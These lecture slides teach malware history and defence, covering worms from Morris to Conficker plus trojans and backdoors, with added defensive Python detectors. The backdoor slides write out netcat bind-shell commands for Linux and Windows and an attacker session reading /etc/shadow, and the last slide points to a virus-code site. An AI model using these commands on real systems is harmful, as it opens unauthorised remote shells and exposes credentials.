Introduction
• Today, cover malware
– Worms, Trojan Horses / Backdoors
– Define Rootkits, viruses - cover later
– Nearly all of these infect computers via the network
• Email counts as a form of remote infection
– If you do decide to write one for fun don't release it … could wind up in jail
Definitions
• Worm
– Replicates itself, stand-alone program, spreads via network
• Virus
– Program that attaches itself to another program
– Replicates itself, program must be run
• Trojan horse
– Program that pretends to do one thing but does something behind the scenes
• Rootkit
– A component that uses stealth to maintain a persistent and undetectable presence on the machine
Purpose of Malware
• What is the main purpose of most malware?
• Profit!!!!
• Modern malware is a for-profit, big-business undertaking
• Online criminals invest significant amounts of money and time in more efficient malware and better malware distribution mechanisms because financial rewards can be enormous
Purpose of Malware
• How is it distributed these days?
• Malware has been part of computing for decades
• In the 1990s, floppy disks: it got onto your computer or network when you stuck an infected floppy disk into your drive
• Then, as email became more prevalent, hackers designed malware to spread as infected email attachments
• Today, the Internet is a fantastic distribution mechanism for malware
Worms
• A worm is self-replicating software designed to spread through the network
– Typically exploits security flaws in widely used services ... mostly buffer overflows
– Causes massive damage
• Launch DDOS attacks, install bot networks
• Access sensitive information
• Used for spam
Worms
• Worm vs Virus vs Trojan horse
– A virus is code embedded in a file or program
– Viruses and Trojan horses rely on humans
• Human must access file or run program
– Worms are often self-contained and may spread autonomously ... and they do!
• Can also spread via email, Internet
Worms: How Do They Spread?
• Copy itself directly across the network
• Read your address book
– Emails itself to everyone in your address book
– How easy is it to do this?
– Microsoft Outlook – was trivial, < 5 lines of code to send out an email
– Can cause Outlook to send emails without user awareness
– Reason why so many worms for Outlook
Morris Worm
• First appeared in 1988
• Purpose
– Determine where it could spread
– Spread its infection
– Remain undiscovered
• Morris claimed his worm had a bug…
• Morris worm tried to re-infect systems
– Led to resource exhaustion
Morris Worm
• How did it spread?
• Tried to obtain access to machine by…
– User account password guessing
– Exploited buffer overflow in fingerd
– Exploited debug code in sendmail
• Flaws in fingerd and sendmail were well-known at the time, but not widely patched
Morris Worm
• Once access had been obtained to machine…
• "Bootstrap loader" sent to victim
– Consisted of 99 lines of C code
• Victim machine compiled and executed code
• Bootstrap loader fetched the rest of worm
Morris Worm
• Why was it successful?
– If transmission of worm was interrupted, all code was deleted
– Code encrypted when downloaded
– Code deleted after decrypting and compiling
– When running, worm regularly changed its name and process identifier (PID)
I-Love-You Worm
• E-mail worm arrived May 4, 2000, with subject "ILOVEYOU" and an attachment
– LOVE-LETTER-FOR-YOU.TXT.vbs
I-Love-You Worm
• LOVE-LETTER-FOR-YOU.TXT.vbs
– Upon opening attachment, software sent copy of itself to everyone in user's address list, posing as user
• Overwrote all these file types:
• VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG, JPEG, MP3, and MP2
• Overwritten files contain worm's body and extensions changed to vbs
I-Love-You Worm
• How did it spread?
• Sent a copy of itself to first 50 addresses in Windows Address Book used by Microsoft Outlook
• Why was it successful?
• Took advantage of a Microsoft algorithm for hiding file extensions. Windows had begun hiding extensions by default
• Enticed users to open the attachment, ensuring continued propagation
• Exploited systemic weaknesses in design of Microsoft Outlook and Microsoft Windows which led to unused features easily running malicious code capable of achieving complete access to the operating system
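An added mail-gateway check for the extension-hiding trick described above (example code, not from the original slides): with "hide extensions for known file types" on, Explorer shows LOVE-LETTER-FOR-YOU.TXT.vbs as LOVE-LETTER-FOR-YOU.TXT. The function simulates that display rule and flags attachments whose real extension is a runnable script or executable hidden behind a document-like one. The two extension sets are this example's own constructed lists, not an authoritative Windows list.

```python
from dataclasses import dataclass

# Extensions Windows treats as runnable script/executable content.
# Constructed list for this example (the slide itself names only .vbs).
RUNNABLE_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsh", "wsf", "sct",
                       "hta", "exe", "scr", "pif", "bat", "cmd"}

# "Decoy" extensions a user would take for harmless data (constructed list).
DOCUMENT_LIKE_EXTENSIONS = {"txt", "doc", "pdf", "jpg", "jpeg", "mp3",
                            "mp2", "htm", "html", "css"}


@dataclass
class Verdict:
    filename: str
    displayed_name: str   # what Explorer shows with "hide extensions" on
    real_extension: str
    suspicious: bool
    reason: str


def explorer_display_name(filename: str) -> str:
    """Simulate 'hide extensions for known file types': drop the final extension."""
    base, dot, _ext = filename.rpartition(".")
    return base if dot else filename


def inspect_attachment(filename: str) -> Verdict:
    """Flag an attachment whose visible name hides a runnable extension."""
    parts = filename.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    displayed = explorer_display_name(filename)
    # The inner (visible) extension is whatever the displayed name ends with.
    inner_ext = displayed.lower().rpartition(".")[2] if "." in displayed else ""
    if real_ext in RUNNABLE_EXTENSIONS and inner_ext in DOCUMENT_LIKE_EXTENSIONS:
        return Verdict(filename, displayed, real_ext, True,
                       f"runnable .{real_ext} disguised as .{inner_ext} (double extension)")
    if real_ext in RUNNABLE_EXTENSIONS:
        return Verdict(filename, displayed, real_ext, True,
                       f"runnable attachment .{real_ext}")
    return Verdict(filename, displayed, real_ext, False, "")


def filter_attachments(names):
    """Return the verdicts for a whole message's attachment list."""
    return [inspect_attachment(n) for n in names]


if __name__ == "__main__":
    for v in filter_attachments(["LOVE-LETTER-FOR-YOU.TXT.vbs", "holiday.jpg", "setup.exe"]):
        print(v)
```

The check is a gateway-side mirror of what the user cannot see: the decision is made on the real final extension, not on the name Windows would display.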
Code Red I
• July 13, 2001: First worm of modern era
• Exploited buffer overflow in Microsoft's Internet Information Server (IIS)
• How did it spread?
– 1st through 20th of each month: Spread
• Find new targets by random scan of IP address space
• Spawn 99 threads to generate addresses and look for IIS
• Creator forgot to seed random number generator, and every copy scanned same set of addresses ... Oops
– 21st through the end of each month: Attack
• Defaced websites with "HELLO! Welcome to http://www.worm.com! Hacked by Chinese!"
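The "forgot to seed" bug, as an added simulation (not Code Red's code): each instance draws its scan addresses from a pseudo-random generator, so when every instance starts from the same seed, N copies cover exactly the same addresses as one copy. The function names, the seed-selection rules and the instance/scan counts are this example's own; it assumes only that the generator's output is fully determined by its seed.

```python
import random


def scan_addresses(seed, count):
    """Addresses one worm instance would pick: a PRNG sequence fully determined
    by its seed (assumption of this example), returned as 32-bit integers."""
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(count)]


def distinct_coverage(n_instances, scans_per_instance, seed_for):
    """Distinct addresses covered by n instances that each scan
    `scans_per_instance` addresses; `seed_for(i)` gives instance i's seed."""
    covered = set()
    for i in range(n_instances):
        covered.update(scan_addresses(seed_for(i), scans_per_instance))
    return len(covered)


def unseeded(i):
    # Code Red I: no seeding, so every copy starts its generator in the same state.
    return 0


def seeded_per_instance(i):
    # Code Red I v2 fixed the bug; here each copy gets its own seed (constructed values).
    return 0xC0DE + i


def compare(n_instances=100, scans=50):
    """Coverage of the address space with identical vs. distinct seeds."""
    return {
        "same_seed": distinct_coverage(n_instances, scans, unseeded),
        "distinct_seeds": distinct_coverage(n_instances, scans, seeded_per_instance),
    }


if __name__ == "__main__":
    print(compare())
```

With identical seeds the total coverage never exceeds one instance's share, which is why the first Code Red burned its 99 threads on the same addresses over and over.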
Code Red I v2
• July 19, 2001: Same codebase as Code Red I, but fixed the bug in random IP address generation
– Compromised all vulnerable IIS servers on Internet
– Fast spread
• Scanned address space grew exponentially
• 350,000 hosts infected in 14 hours!!
• Payload: distributed packet flooding (denial of service) attack on www.whitehouse.gov
Code Red II
• August 4, 2001: Same IIS vulnerability, completely different code, kills Code Red I
– Known as "Code Red II" because of comment in code
– Worked only on Windows 2000, crashed NT
• Scanning algorithm preferred nearby addresses
– Chose addresses from same class A with probability 1/2, same class B with probability 3/8, and randomly from the entire Internet with probability 1/8
• Payload: installed root backdoor in IIS servers for unrestricted remote access
• Died by design on October 1, 2001
[Figure: timeline of Code Red and Nimda activity. Annotations: Code Red 2 kills off Code Red 1; Code Red 2 settles into weekly pattern; Nimda enters the ecosystem; Code Red 2 dies off as programmed; CR 1 returns thanks to bad clocks. Slides: Vern Paxson]
SQL Slammer
• Another modern worm, SQL Slammer, January 2003
– Although titled "SQL slammer worm", program didn't use SQL language
• How did it work?
• It exploited a buffer overflow bug in Microsoft's SQL Server and Desktop Engine database products, for which a patch had been released six months earlier
• Affected Microsoft SQL 2000
– Vulnerable population, 75,000 machines infected in less than 10 minutes
http://en.wikipedia.org/wiki/SQL_slammer_worm
[Figure: geographic spread of Slammer at 05:29:00 UTC, January 25, 2003, and 30 minutes later; size of circles is logarithmic in the number of infected machines. From Moore et al. "The Spread of the Sapphire/Slammer Worm"]
Secret of Slammer's Speed
• Why was it successful?
• Old-style worms (Code Red) spawn a new thread which tries to establish TCP connection
• If successful, send a copy of itself over TCP
– Limited by latency of the network
• Slammer, improved concept, connectionless UDP worm
– No connection establishment, simply sent 404-byte UDP packet to randomly generated IP addresses
– Limited only by bandwidth of the network
Modern Worms Don't Just Spread
• Old-Style Worms
– Mostly to spread, very noticeable in attacks
– How fast and far can we go?
– Sometimes, dropped other malware to maintain access
• Modern Worms – Stealthier
– Always have payload of more malware
– Many infection vectors - not just one
– Use resources of machine, glean user information
Modern Worms Don't Just Spread
• These worms spread more subtly
– Without making noise
– Symptoms don't appear immediately, infected computer can sit dormant for a long time
– If it were a disease,
• More like syphilis, whose symptoms may be mild or disappear altogether,
• Eventually come back years later and eat your brain !!
– Bruce Schneier http://www.schneier.com/blog/archives/2007/10/the_storm_worm.html
Storm Worm 2007
• How did it spread?
• Spread by cleverly designed spam campaign
– Arrived as an email with catchy subject
• First instance: "230 dead as storm batters Europe"
• Other examples: "Condoleeza Rice has kicked German Chancellor", "Radical Muslim drinking enemies's blood", "Saddam Hussein alive!", "Fidel Castro dead", etc.
• Attachment or URL with malicious payload
– FullVideo.exe, MoreHere.exe, ReadMore.exe, etc.
– Also masquerade as flash postcards
• Once opened,
• Installs trojan (wincom32) and rootkit !!!
Storm Worm Characteristics
• Infected host joined Botnet
• Obfuscated P2P control structure
– Interacted with peers via eDonkey protocol
• Obfuscated code, anti-debugging defenses
– Goes into infinite loop if detects VMware or Virtual PC
– Large number of spurious probes, evidence of external analysis, triggers distributed DoS attack
• Infection Estimates
• Between 1 million and 50 million computers infected worldwide
Storm Worm Characteristics
• Storm's Payload
• Morphs every 30 minutes or so
– Typical AV (antivirus) and IDS techniques less effective --- they use code signatures to detect
• Storm e-mail also changes all the time, leveraging social engineering techniques
– There are always new subject lines and new enticing text
• Storm began attacking anti-spam sites focused on identifying it -- spamhaus.org, 419eater and so on -- and the personal website of Joe Stewart, who published an analysis of Storm
Conficker Worm
http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution
• Conficker.A was first detected on 21 November 2008 and exploited MS08-067; below is infection as of 4/1/2009
• MS08-067 Server Service Buffer Overflow
– This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers
– Successful exploitation may result in execution of arbitrary code on the target host with System privileges!!!!
Conficker Worm
• Conficker.B, detected in February 2009, added ability to spread through network shares and removable storage devices
– USB drives and AutoRun function in Windows
• Conficker.C shuts down security services, blocks computers from connecting to security Web sites, and downloads a Trojan
• Also reaches out to other infected computers via peer-to-peer networking
– Includes a list of 50,000 different domains; 500 will be contacted by the infected computer on April 1 to receive updated copies or other malware or instructions
Conficker Worm
• Where did Conficker come from?
– Ties to Russian Business Network, not sure
• Currently still a problem
http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking
Worm Propagation Methods
• Scanning worms - Worm chooses "random" address
• Coordinated scanning - Different worm instances scan different addresses
• Meta-server worm - Ask server for hosts to infect
• Topological worm - Uses information from infected hosts
– Web server logs, email address books, config files, SSH "known hosts"
• Contagion worm - Propagate parasitically along with normally initiated communication
Worm Signature
• Monitor network and look for strings common to traffic with worm-like behavior
• Signatures can then be used for content filtering
Slide: S Savage
Content Sifting
• Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm
• Two Consequences
– Content Prevalence: W will be more common in traffic than other bitstrings of the same length
– Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
• Content sifting: find W's with high content prevalence and high address dispersion and drop that traffic
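A small implementation of the signature-generation idea on the two slides above (an added example, not the original authors' code; the slide credits S. Savage, whose system is not reproduced here). It counts fixed-length byte windows across packets, tracks the distinct sources and destinations each window was seen between, reports windows that pass both a prevalence and a dispersion threshold, and coalesces adjacent flagged windows into one longer invariant string W. The packets, the window length and the thresholds are constructed for the example.

```python
from collections import defaultdict

# Constructed sample traffic, not a real capture: (src, dst, payload).
# Four ordinary HTTP requests all go to one web server; four packets carry the
# same invariant "worm body" between unrelated sources and destinations.
SAMPLE_PACKETS = [
    ("10.0.0.1", "10.0.1.5", b"GET /index.html HTTP/1.1\r\nHost: intranet\r\n"),
    ("10.0.0.2", "10.0.1.5", b"GET /about.html HTTP/1.1\r\nHost: intranet\r\n"),
    ("10.0.0.3", "10.0.1.5", b"GET /news.html HTTP/1.1\r\nHost: intranet\r\n"),
    ("10.0.0.4", "10.0.1.5", b"GET /docs.html HTTP/1.1\r\nHost: intranet\r\n"),
    ("10.0.0.7", "192.168.3.9", b"\x90\x90WORM-INVARIANT-BODY\x00xq1w"),
    ("10.0.0.8", "172.16.0.22", b"\x90\x90WORM-INVARIANT-BODY\x00lk9m"),
    ("10.0.0.9", "10.9.9.9", b"\x90\x90WORM-INVARIANT-BODY\x00pa7c"),
    ("10.0.0.10", "203.0.113.4", b"\x90\x90WORM-INVARIANT-BODY\x00zz4e"),
]


class ContentSifter:
    """Track prevalence and address dispersion of every fixed-length window."""

    def __init__(self, window=8, prevalence_threshold=3, dispersion_threshold=3):
        self.window = window                          # bytes per candidate substring
        self.prevalence_threshold = prevalence_threshold
        self.dispersion_threshold = dispersion_threshold
        self.count = defaultdict(int)                 # window -> packets containing it
        self.sources = defaultdict(set)               # window -> distinct sources
        self.dests = defaultdict(set)                 # window -> distinct destinations

    def observe(self, src, dst, payload: bytes):
        w = self.window
        # Count each distinct window once per packet so repeats inside one
        # payload do not inflate prevalence.
        for sub in {payload[i:i + w] for i in range(len(payload) - w + 1)}:
            self.count[sub] += 1
            self.sources[sub].add(src)
            self.dests[sub].add(dst)

    def candidate_signatures(self):
        """Windows that are both prevalent and widely dispersed."""
        return sorted(
            sub for sub, n in self.count.items()
            if n >= self.prevalence_threshold
            and len(self.sources[sub]) >= self.dispersion_threshold
            and len(self.dests[sub]) >= self.dispersion_threshold
        )

    def maximal_signatures(self, payload: bytes):
        """Coalesce runs of adjacent flagged windows in a payload into longer W's."""
        flagged = set(self.candidate_signatures())
        w, runs, start, end = self.window, [], None, 0
        for i in range(len(payload) - w + 1):
            if payload[i:i + w] in flagged:
                if start is None:
                    start = i
                end = i + w
            elif start is not None:
                runs.append(payload[start:end])
                start = None
        if start is not None:
            runs.append(payload[start:end])
        return runs


def should_drop(signatures, payload: bytes):
    """Content-filtering step: drop traffic carrying any learned signature."""
    return any(sig in payload for sig in signatures)


def run_sample():
    sifter = ContentSifter()
    for src, dst, payload in SAMPLE_PACKETS:
        sifter.observe(src, dst, payload)
    return sifter


if __name__ == "__main__":
    s = run_sample()
    print(s.maximal_signatures(SAMPLE_PACKETS[4][2]))
```

The HTTP windows (for instance b"HTTP/1.1") are just as prevalent as the worm's, but every request goes to the same server, so their destination dispersion stays at one and they are never promoted to a signature; the worm body passes both tests because prevalence alone is not the criterion.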
Malicious Code
• Using Worms transformed into Botnets
• Hundreds of thousands of vulnerable computers are being used to launch spam campaigns
• 70 percent of all spam is now sent this way, according to anti-spam firm Message Labs Inc.
• Perhaps 6 to 7 billion spam messages are routed through hacked home computers
Malicious Code
• Attack Trends
– Crossbreeding
• Combo Malware raises threat, treats each element as a building block
• Malware developer of today constructs an attack tool by selecting various blocks and combining them in a single piece of code
– Worms used to spread backdoors
– Bugbear.b worm, which appeared in 2003, featured several backdoors
– Blaster worm and Sobig.F virus also installed backdoors
Malicious Code
• Attack Trends
• Combo Malware ... far more likely to find some hole in your defenses than single-trick malware
• To fight combo malware, you need more than your signature-based AV engine loaded on servers and desktops
• You need to think in terms of holistic defense, addressing multiple vulnerability points, hardening your overall network and preparing for the worst
Ed Skoudis
Maintaining Access
• Once you have infected computer,
• Gotten in through a vulnerability
• System or Human
• Maintaining access needs a stealthy way back in ..
• Install a remote control backdoor on victim system
• Backdoor allows attacker access in the future
Backdoors
• What is a Backdoor?
– Once penetrate machine through one of the ways we talked about previously
– Want to install a future access point
– A backdoor is a way in to the system that allows an attacker admission whenever they want
Backdoors
• Example – Netcat tool
• Claim that netcat is one of the most popular backdoor tools in use today
• Netcat when run on victim machine can be configured to listen on any TCP port
– Executes any program for traffic coming in on that port
– Will have same permission as account from which netcat was executed
– Can send it data and have it executed on victim machine
• Assume attacker has gained access to a victim machine and wants to set up a command-shell backdoor
Backdoors – Linux Example
$ nc -l -p 12345 -e /bin/sh          (backdoor on victim_machine)
Runs the netcat program which listens on TCP port 12345 and executes shell with data sent on port 12345
$ nc victim_machine 12345            (client on attacker machine)
cmd: ls                              (will list contents of directory from victim machine)
sensitive_documents tools games
cmd: cat /etc/shadow                 (only works if user on victim has root)
Backdoors
• Example - Windows Machine
• Can also use netcat on Windows machine
• Instead of /bin/sh will use cmd.exe
C:\> nc -l -p 12345 -e cmd.exe       (on victim machine)
Similar results!
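From the defender's side, the listeners on the two slides above leave a recognisable process-table footprint: a netcat binary started with a listen flag and an exec option (-e, -c, --exec). This added Python check (not from the slides) parses a constructed `ps -eo pid,user,args` listing and reports such processes; the same logic applies to a Windows process listing where the command is nc.exe -l -p 12345 -e cmd.exe. The process-name set, the sample lines and the function names are this example's own. A renamed binary defeats a name check, so in practice pair this with a listening-socket inventory (ss -ltnp or netstat) and look for ports nothing legitimate should own.

```python
import shlex

# Binary names to treat as netcat variants (constructed list for this example).
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "nc64.exe"}

# Constructed sample of `ps -eo pid,user,args` output, not a real capture.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  842 www-data nginx: worker process
 1337 alice    nc -l -p 12345 -e /bin/sh
 1400 bob      nc -vz intranet 443
 1522 root     /usr/bin/ncat --listen 4444 --exec /bin/bash
 1601 alice    nc -l -p 8080
"""


def parse_ps(text):
    """Split a ps listing into (pid, user, args) tuples, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append((int(parts[0]), parts[1], parts[2]))
    return rows


def inspect_command(args):
    """Return (port, program) when args look like a netcat listener that hands
    its socket to a program; None for anything else (including plain listeners)."""
    try:
        argv = shlex.split(args)
    except ValueError:            # unbalanced quotes in the command line
        argv = args.split()
    if not argv or argv[0].rsplit("/", 1)[-1].lower() not in NETCAT_NAMES:
        return None
    listening, program, port = False, None, None
    for i, tok in enumerate(argv[1:], start=1):
        # -l on its own or inside a cluster such as -lvp; ncat spells it --listen
        if tok == "--listen" or (tok.startswith("-") and not tok.startswith("--") and "l" in tok[1:]):
            listening = True
        if tok in ("-e", "-c", "--exec", "--sh-exec") and i + 1 < len(argv):
            program = argv[i + 1]
        if tok.isdigit() and port is None:
            port = int(tok)
    return (port, program) if listening and program else None


def find_bind_shell_listeners(ps_text):
    """Report every process in the listing that matches the backdoor pattern."""
    findings = []
    for pid, user, args in parse_ps(ps_text):
        hit = inspect_command(args)
        if hit:
            port, program = hit
            findings.append({"pid": pid, "user": user, "port": port, "program": program})
    return findings


if __name__ == "__main__":
    for f in find_bind_shell_listeners(SAMPLE_PS):
        print(f"pid {f['pid']} ({f['user']}) listens on {f['port']} and execs {f['program']}")
```

Note that the "user" field is the account whose permissions the shell will carry, exactly as the slide says: a listener owned by root is the finding to escalate first.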
Backdoors and Trojans
• Trojans – Classic example:
• Replace /bin/login - lets users log in to system but saves passwords for later analysis
• Trojan Backdoor
• Combination of a backdoor hiding inside of a trojan program
Summary
– Malware – Viruses, Worms and combinations including Trojan backdoor components are rampant
– Continues to be a serious problem for everyone using the Internet
– Not just teenagers looking to brag anymore
• More and more the proliferation appears to be related to the business of spamming
• Resources: http://vx.netlux.org/ good for code examples